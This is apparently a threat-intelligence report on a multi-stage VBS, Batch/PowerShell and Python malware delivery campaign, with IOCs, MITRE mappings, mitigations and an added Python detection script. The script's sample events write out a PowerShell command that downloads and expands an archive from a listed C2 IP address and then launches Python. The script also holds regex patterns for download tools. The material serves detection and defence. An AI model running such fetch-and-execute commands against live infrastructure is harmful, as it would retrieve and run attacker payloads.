# Full Report
Recently LevelBlue SpiderLabs initiated an investigation into a multi-stage malware delivery campaign initially identified from LevelBlue’s MDR SOC through a SentinelOne detection of a suspicious Visual Basic Script (VBS) file.
# Analysis Summary
# Tool/Technique: Multi-Stage VBS-to-Python Delivery Campaign
## Overview
This campaign uses a sophisticated, multi-stage delivery chain designed to slip past traditional perimeter controls. It begins with a suspicious Visual Basic Script (VBS) and proceeds through a series of PowerShell and Batch scripts that eventually deploy Python-based payloads. The primary goal appears to be establishing persistence and stealing information by abusing open-source tooling.
## Technical Details
- **Type:** Multi-stage Downloader / Malware Delivery Chain
- **Platform:** Windows
- **Capabilities:** Credential theft, persistence, remote command execution, and automated payload retrieval.
- **First Seen:** 2024 (LevelBlue SpiderLabs investigation)
## MITRE ATT&CK Mapping
- **TA0002 - Execution**
  - T1059.001 - PowerShell
  - T1059.003 - Windows Command Shell
  - T1059.005 - Visual Basic
- **TA0003 - Persistence**
  - T1547.001 - Registry Run Keys / Startup Folder
- **TA0005 - Defense Evasion**
  - T1027 - Obfuscated Files or Information
  - T1140 - Deobfuscate/Decode Files or Information
- **TA0011 - Command and Control**
  - T1105 - Ingress Tool Transfer
## Functionality
### Core Capabilities
- **Script-Based Chaining:** Uses a sequence of VBS, CMD, and PowerShell scripts to fetch secondary payloads, making detection via static signatures difficult.
- **Automated Download:** The scripts reach out to remote servers to pull down `.zip` archives containing the execution environment (Python) and malicious code.
- **Payload Extraction:** Automatically unzips and executes contents from archives like `64RUZPQ.zip` and `RUZPQ.zip`.
### Advanced Features
- **Dynamic Tasking:** Uses text files (e.g., `UKAA1.txt`, `UKBB2.txt`) hosted on C2 servers to provide updated instructions or URLs for the next stage of the attack.
- **Living-off-the-Land (LotL):** Minimizes the use of custom binaries in the early stages, relying instead on built-in Windows interpreters.
## Indicators of Compromise
- **File Hashes (SHA-1):**
  - `F66364A3566D48E0588237E288003C541AE0FD73` (UKCC1.bat)
  - `C72921D080EA0273F54B8CF2F7EF1241CCA16D71` (64RUZPQ.zip)
  - `9B90E2C49B52620531A75D4F23DD48DA25670E03` (RUZPQ.zip)
  - `A27315CE27675E953AEC70A7639E2EA3F77B7159` (UKAA1.txt/UKBB1.txt)
- **File Names:**
  - `UKCC1.bat`
  - `64RUZPQ.zip`
  - `RUZPQ.zip`
  - `UKAA2.txt`, `UKBB2.txt`, `UKFF2.txt`
- **Network Indicators:**
  - `hxxp[://]103[.]145[.]12[.]195`
  - `hxxp[://]64[.]226[.]122[.]217`
- **Behavioral Indicators:**
  - Unusual `wscript.exe` or `cscript.exe` execution reaching out to remote network resources.
  - PowerShell command lines containing `Invoke-WebRequest` or `Expand-Archive` that target temporary directories.
## Associated Threat Actors
- **Unknown:** While the campaign was identified during an investigation into Israel-Iran geopolitical tensions, specific attribution to a known group was not finalized in the report.
## Detection Methods
- **Behavioral Detection:** Monitor for secondary script execution (Batch/PowerShell) spawned by `wscript.exe`.
- **SIEM Rules:** Look for PowerShell downloading files from direct-to-IP URLs rather than established domains.
- **Endpoint Monitoring:** Detect the creation of `.zip` or `.txt` files in the `%TEMP%` or `%APPDATA%` folders followed by immediate execution of a Python interpreter from those same folders.
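The behavioral indicators and the three detection methods above can be expressed as a small set of rules run over normalised endpoint telemetry. The following is an added example written for this write-up, not code from LevelBlue or the report; it assumes EDR/Sysmon-style process-creation and file-creation events have already been flattened into dicts with the field names shown (`type`, `ts`, `image`, `parent_image`, `cmdline`, `path`), which is an assumption, and the sample events are constructed for the demonstration (only the IP addresses and file names come from the indicators listed above). It also refangs the published network IOCs so they can be matched against raw command lines.

```python
"""Detection rules for a VBS -> Batch/PowerShell -> Python delivery chain.

Added example; not the report's own code. Field names and sample telemetry
are assumptions/constructed for illustration.
"""
import re
from datetime import datetime, timedelta

# Network indicators as published (defanged) in the report.
DEFANGED_IOCS = [
    "hxxp[://]103[.]145[.]12[.]195",
    "hxxp[://]64[.]226[.]122[.]217",
]


def refang(ioc: str) -> str:
    """Turn a defanged indicator back into a string that matches live telemetry."""
    return ioc.replace("hxxp", "http").replace("[://]", "://").replace("[.]", ".")


KNOWN_BAD_HOSTS = {refang(i).split("://", 1)[1] for i in DEFANGED_IOCS}

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SECONDARY_INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
PYTHON = {"python.exe", "pythonw.exe"}
URL_RE = re.compile(r"https?://([^/\s'\";]+)", re.I)          # captures host[:port]
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")    # direct-to-IP URL
DOWNLOAD_RE = re.compile(r"invoke-webrequest|expand-archive|\biwr\b|\bcurl\b|\bwget\b", re.I)
STAGING_RE = re.compile(r"\\(?:temp|appdata)\\", re.I)         # %TEMP% / %APPDATA% paths
STAGED_EXT = (".zip", ".txt")
PYTHON_WINDOW = timedelta(minutes=5)   # "immediate" execution after the drop


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def dirname(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[0].lower()


def detect(events):
    """Run all rules over time-ordered events; return (rule_name, timestamp) alerts."""
    alerts = []
    staged = []  # (ts, directory) of .zip/.txt files dropped into a staging dir
    for ev in events:
        if ev["type"] == "process":
            image = basename(ev["image"])
            parent = basename(ev.get("parent_image", ""))
            cmd = ev.get("cmdline", "")
            # Rule 1: Windows Script Host spawning a Batch/PowerShell interpreter.
            if parent in SCRIPT_HOSTS and image in SECONDARY_INTERPRETERS:
                alerts.append(("wsh_spawns_script", ev["ts"]))
            # Rule 2: PowerShell download/extract from a known C2 or a bare IP,
            # or writing into a temp/appdata directory.
            if image in POWERSHELL and DOWNLOAD_RE.search(cmd):
                for host in URL_RE.findall(cmd):
                    host = host.lower()
                    if host.split(":")[0] in KNOWN_BAD_HOSTS:
                        alerts.append(("known_c2_host", ev["ts"]))
                    if IPV4_RE.match(host):
                        alerts.append(("direct_ip_download", ev["ts"]))
                if STAGING_RE.search(cmd):
                    alerts.append(("download_to_staging_dir", ev["ts"]))
            # Rule 3: a Python interpreter launched from (or below) a staging
            # directory shortly after an archive/text file was dropped there.
            if image in PYTHON:
                for ts, directory in staged:
                    if dirname(ev["image"]).startswith(directory) and \
                            timedelta(0) <= ev["ts"] - ts <= PYTHON_WINDOW:
                        alerts.append(("python_from_staging_dir", ev["ts"]))
                        break
        elif ev["type"] == "file":
            path = ev["path"]
            if STAGING_RE.search(path) and path.lower().endswith(STAGED_EXT):
                staged.append((ev["ts"], dirname(path)))
    return alerts


# Constructed sample telemetry (not from the report) reproducing the described chain.
T0 = datetime(2024, 6, 1, 9, 0, 0)
SAMPLE_EVENTS = [
    {"type": "process", "ts": T0, "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'wscript.exe "C:\Users\u\Downloads\attachment.vbs"'},
    {"type": "process", "ts": T0 + timedelta(seconds=2), "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"cmd.exe /c C:\Users\u\AppData\Local\Temp\UKCC1.bat"},
    {"type": "process", "ts": T0 + timedelta(seconds=3),
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"powershell.exe -w hidden -c Invoke-WebRequest http://103.145.12.195/64RUZPQ.zip "
                r"-OutFile C:\Users\u\AppData\Local\Temp\64RUZPQ.zip; Expand-Archive "
                r"C:\Users\u\AppData\Local\Temp\64RUZPQ.zip -DestinationPath C:\Users\u\AppData\Local\Temp\64RUZPQ"},
    {"type": "file", "ts": T0 + timedelta(seconds=5),
     "path": r"C:\Users\u\AppData\Local\Temp\64RUZPQ.zip", "image": "powershell.exe"},
    {"type": "process", "ts": T0 + timedelta(seconds=9),
     "image": r"C:\Users\u\AppData\Local\Temp\64RUZPQ\python.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe", "cmdline": r"python.exe main.py"},
    # Benign control: an admin fetching a tool from a named host into a non-staging directory.
    {"type": "process", "ts": T0 + timedelta(minutes=30),
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe Invoke-WebRequest https://www.example.com/tool.zip -OutFile C:\tools\tool.zip"},
]

if __name__ == "__main__":
    for name, ts in detect(SAMPLE_EVENTS):
        print(f"{ts:%H:%M:%S}  {name}")
```

Each rule maps to one bullet above: `wsh_spawns_script` to the behavioral detection, `known_c2_host`/`direct_ip_download` to the SIEM rule, and `download_to_staging_dir` plus `python_from_staging_dir` to the endpoint-monitoring check. Rule 1 will also fire on legitimate logon scripts that chain into `cmd.exe`, so in production it is best scored together with the download and staging-directory rules rather than alerted on alone.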
## Mitigation Strategies
- **Prevention Measures:** Disable Windows Script Host (WSH) if VBS scripts are not required for business operations.
- **Hardening:** Implement AppLocker or Windows Defender Application Control (WDAC) to prevent scripts from executing in user-writable directories.
- **Network Security:** Block outbound connections to known malicious IP addresses and restrict PowerShell's ability to reach the internet via proxy configurations.
## Related Tools/Techniques
- **Python-based Stealers:** Similar to tools like "Blank-Grabber" or "LUMMA" that often use multi-stage script loaders.
- **Malicious VBS Loaders:** Commonly used in the delivery of Qakbot or Emotet.